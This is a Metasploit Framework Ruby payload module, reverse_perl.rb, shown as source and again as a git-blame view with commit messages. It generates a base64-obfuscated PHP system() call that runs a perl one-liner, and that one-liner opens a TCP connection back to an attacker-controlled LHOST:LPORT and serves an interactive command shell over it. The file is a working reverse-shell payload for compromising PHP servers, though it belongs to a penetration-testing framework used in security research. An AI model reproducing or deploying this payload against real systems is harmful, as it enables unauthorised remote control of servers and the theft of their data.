metasploit-framework/modules/payloads/singles/php/reverse_perl.rb

##
# $Id:$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'

module Msf
module Payloads
module Singles
module Php

module ReversePerl

	include Msf::Payload::Single

	def initialize(info = {})
		super(merge_info(info,
			'Name'          => 'PHP Command, Double reverse TCP connection (via perl)',
			'Version'       => '$Revision$',
			'Description'   => 'Creates an interactive shell via perl',
			'Author'        => 'cazz',
			'License'       => BSD_LICENSE,
			'Platform'      => 'php',
			'Arch'          => ARCH_PHP,
			'Handler'       => Msf::Handler::ReverseTcp,
			'Session'       => Msf::Sessions::CommandShell,
			'PayloadType'   => 'cmd',
			'Payload'       =>
				{
					'Offsets' => { },
					'Payload' => ''
				}
			))
	end

	#
	# Constructs the payload
	#
	def generate
		return super + "system(base64_decode('#{Rex::Text.encode_base64(command_string)}'))"
	end
	
	#
	# Returns the command string to use for execution
	#
	def command_string
		cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"#{datastore['LHOST']}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
	end

end

end end end end
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`
			`# $Id:$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/projects/Framework/`
			`##`


Initial support for PHP payloads git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 07:57:51 +00:00			`require 'msf/core'`
			`require 'msf/core/handler/reverse_tcp'`
			`require 'msf/base/sessions/command_shell'`

			`module Msf`
			`module Payloads`
			`module Singles`
			`module Php`

			`module ReversePerl`

			`include Msf::Payload::Single`

			`def initialize(info = {})`
			`super(merge_info(info,`
			`'Name' => 'PHP Command, Double reverse TCP connection (via perl)',`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`'Version' => '$Revision$',`
Initial support for PHP payloads git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 07:57:51 +00:00			`'Description' => 'Creates an interactive shell via perl',`
			`'Author' => 'cazz',`
			`'License' => BSD_LICENSE,`
			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
			`'Handler' => Msf::Handler::ReverseTcp,`
			`'Session' => Msf::Sessions::CommandShell,`
			`'PayloadType' => 'cmd',`
			`'Payload' =>`
			`{`
			`'Offsets' => { },`
			`'Payload' => ''`
			`}`
			`))`
			`end`

			`#`
			`# Constructs the payload`
			`#`
			`def generate`
PHP tags are now added by the php_include handler and no longer a part of the payloads themselves git-svn-id: file:///home/svn/framework3/trunk@4254 4d416f70-5f16-0410-b530-b9f4589650da 2007-01-05 03:31:18 +00:00			`return super + "system(base64_decode('#{Rex::Text.encode_base64(command_string)}'))"`
Initial support for PHP payloads git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 07:57:51 +00:00			`end`

			`#`
			`# Returns the command string to use for execution`
			`#`
			`def command_string`
			`cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"#{datastore['LHOST']}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"`
			`end`

			`end`

			`end end end end`